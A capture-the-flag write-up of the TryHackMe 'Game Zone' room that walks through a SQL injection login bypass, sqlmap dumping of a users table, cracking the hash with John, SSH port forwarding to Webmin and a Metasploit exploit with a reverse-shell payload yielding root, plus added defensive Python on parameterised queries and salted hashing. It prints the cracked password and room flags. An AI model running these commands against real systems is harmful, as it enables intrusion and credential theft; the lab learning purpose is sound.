Game Zone [TryHackMe]
2023-09-01

Introduction
I continue with the "Offensive Pentesting" learning path, this time with a simple machine that gives a practical example of SQL injection with sqlmap and of using an SSH tunnel to reach a service blocked by a firewall, finally gaining privileged access with Metasploit.
Task 1 - Deploy the machine
Step 1:
- I start the machine and open the web application it hosts.
- The first question is about the image of a video-game character shown on the site.
Task 2 - Obtain access via SQLi
Step 2:
- The room suggests using
' or 1=1 -- -
to force the authentication: 1=1 makes the condition always true, and "-- -" comments out whatever comes after it.
- The SQL query executed on the web server is the following:
SELECT * FROM users WHERE username = ' or 1=1 -- - AND password :=
- Having bypassed authentication, I reach portal.php
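To show why the payload above works and how the login should have been written, here is an added Python example (not code from the room or the write-up). It rebuilds the users table layout in an in-memory SQLite database with a placeholder pwd value, runs the same payload through a string-concatenated query and through a parameterised one, and returns whether each "login" succeeds.

```python
import sqlite3

# Payload suggested by the room: closes the username string, adds an
# always-true condition and comments out the rest of the WHERE clause.
BYPASS_PAYLOAD = "' or 1=1 -- -"


def make_db():
    """Constructed in-memory copy of the db.users layout (username, pwd).
    The stored pwd value is a placeholder, not the real hash."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES ('agent47', 'placeholder-hash')")
    return con


def build_vulnerable_query(username, password):
    """String concatenation as the vulnerable portal does: user input becomes
    part of the SQL text, so its quote and comment are interpreted as SQL."""
    return (f"SELECT * FROM users WHERE username = '{username}' "
            f"AND pwd = '{password}'")


def login_vulnerable(con, username, password):
    """Returns True when the concatenated query matches any row."""
    row = con.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def login_safe(con, username, password):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so the payload is compared literally against the username."""
    row = con.execute(
        "SELECT * FROM users WHERE username = ? AND pwd = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_query(BYPASS_PAYLOAD, "x"))
    print("vulnerable login:", login_vulnerable(con, BYPASS_PAYLOAD, "x"))  # True
    print("safe login:", login_safe(con, BYPASS_PAYLOAD, "x"))              # False
```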
Task 3 - Using SQLMap
Step 3:
- We turn to SQLMap to dump the whole GameZone database.
- I capture a POST request by searching for a game on the site with Burp Suite and save it to a txt file.
POST /portal.php HTTP/1.1
Host: 10.10.62.97
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.62.97
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.62.97/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: PHPSESSID=nn8afcdulm4202grsvrrhspmn1
Connection: close
searchitem=game
- I use sqlmap as the room suggests to dump the database. It doesn't work.
sqlmap -r POST_request.txt --dbms=mysql --dump
- I read up on sqlmap and find a different approach. I start by extracting the names of the existing databases.
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" --dbs
[16:03:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:03:30] [INFO] fetching database names
available databases [5]:
[*] db
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[16:03:30] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
- I extract the table names in db
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db --tables
[16:08:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18, PHP
back-end DBMS: MySQL >= 5.6
[16:08:57] [INFO] fetching tables for database: 'db'
Database: db
[2 tables]
+-------+
| post |
| users |
+-------+
[16:08:57] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
- I extract the column layout of the users table.
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db -T users --columns
[16:11:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:11:58] [INFO] fetching columns for table 'users' in database 'db'
Database: db
Table: users
[2 columns]
+----------+------+
| Column | Type |
+----------+------+
| pwd | text |
| username | text |
+----------+------+
[16:11:58] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
Step 4
- Now that I know the structure, I run the dump with:
sqlmap -u "http://10.10.62.97/portal.php" --data="searchitem=test" -D db -T users -C pwd,username --dump
[16:13:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[16:13:41] [INFO] fetching entries of column(s) 'pwd,username' for table 'users' in database 'db'
[16:13:41] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:13:47] [INFO] writing hashes to a temporary file '/tmp/sqlmapt61grbs538569/sqlmaphashes-dwlpsyxn.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:13:54] [INFO] using hash method 'sha256_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt
[16:14:14] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[16:14:18] [INFO] starting dictionary-based cracking (sha256_generic_passwd)
[16:14:18] [INFO] starting 24 processes
[16:14:20] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]
+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
+------------------------------------------------------------------+----------+
[16:14:20] [INFO] table 'db.users' dumped to CSV file '/home/k3ss/.local/share/sqlmap/output/10.10.62.97/dump/db/users.csv'
[16:14:20] [INFO] fetched data logged to text files under '/home/k3ss/.local/share/sqlmap/output/10.10.62.97'
[*] ending @ 16:14:20 /2023-09-01/
Task 4 - Cracking the hash
Step 5
- I use hashid to identify the hash type. SHA-256 looks most likely.
hashid
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
Analyzing 'ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)
- I attack the hash with John the Ripper
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=24
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2023-09-01 16:20) 6.666g/s 20971Kp/s 20971Kc/s 20971KC/s wildboy23..tom=tom
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed.
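The dump shows the pwd column holds a bare, unsalted SHA-256 of the password (sqlmap's 'sha256_generic_passwd', john's Raw-SHA256), which is why one pass over a wordlist finishes in a second. As an added example, not part of the original write-up, this Python contrasts that storage scheme with a salted, iterated PBKDF2 record and its constant-time verification; the passwords used are constructed.

```python
import hashlib
import hmac
import os


def store_unsalted_sha256(password):
    """What the dumped pwd column contained: one fast hash, no salt, so
    identical passwords give identical digests and a wordlist maps to them."""
    return hashlib.sha256(password.encode()).hexdigest()


# Hardened store: per-user random salt plus a slow, iterated KDF.
# 600k iterations follows current OWASP Password Storage guidance for
# PBKDF2-HMAC-SHA256; tune it to your hardware.
ITERATIONS = 600_000


def store_pbkdf2(password, salt=None):
    """Returns a self-describing record: algorithm$iterations$salt$digest."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, stored):
    """Re-derives the key with the stored salt and iteration count and
    compares in constant time, so timing does not leak digest prefixes."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "constructed-password"  # constructed sample, not the room's
    print(store_unsalted_sha256(pw) == store_unsalted_sha256(pw))  # True
    rec = store_pbkdf2(pw)
    print(rec != store_pbkdf2(pw))                                 # True
    print(verify_pbkdf2(pw, rec), verify_pbkdf2("wrong", rec))    # True False
```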
Step 6
- I log in over SSH with the credentials and get the flag
❯ ssh agent47@10.10.62.97
The authenticity of host '10.10.62.97 (10.10.62.97)' can't be established.
ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.62.97' (ED25519) to the list of known hosts.
agent47@10.10.62.97's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
agent47@gamezone:~$ whoami
agent47
agent47@gamezone:~$ cat
.bash_history .bash_logout .bashrc .cache/ .profile user.txt
agent47@gamezone:~$ cat user.txt
649ac17b1480ac13ef1e4fa579dac95c
Task 5 - Exposing services with reverse SSH tunnels
Step 7
- I check the listening sockets on the target machine
agent47@gamezone:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 *:10000 *:*
udp UNCONN 0 0 *:68 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 *:10000 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
- Port 10000 is blocked by a firewall, so I expose it with an SSH tunnel between the machine and my local host.
❯ ssh -L 10000:localhost:10000 agent47@10.10.62.97
agent47@10.10.62.97's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
109 packages can be updated.
68 updates are security updates.
Last login: Fri Sep 1 09:21:58 2023 from 10.14.50.184
- From my machine I open the URL http://localhost:10000/
- Webmin is running on that socket; I log in with agent47's credentials and see it is version 1.580
Task 6 - Privilege Escalation with Metasploit
Step 8
- I search in Metasploit and configure the exploit for use.
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/http/webmin_backdoor
msf6 > use 0
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set USERNAME agent47
USERNAME => agent47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set PASSWORD videogamer124
PASSWORD => videogamer47
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set LHOST tun0
- I run the exploit.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > run
[*] Exploiting target ::1
...
[*] Session 1 created in the background.
- I open the session and have privileged access.
msf6 exploit(unix/webapp/webmin_show_cgi_exec) > sessions 1
[*] Starting interaction with 1...
whoami
root
- I stabilise the shell with Python, look for the flag and print it to the screen.
python -c 'import pty;pty.spawn("/bin/bash")'
root@gamezone:~# cd
cd
root@gamezone:~# ls
ls
root.txt
root@gamezone:~# cat root.txt
cat root.txt
a4b945830144bdd71908d12d902adeee
Conclusion
Game Zone turned out to be a fairly simple machine. I ran into a problem using sqlmap the way the room suggests, but a quick search gave me a solution: work with sqlmap from the general to the specific, starting by listing the database names and finishing with the data of the exact table I wanted.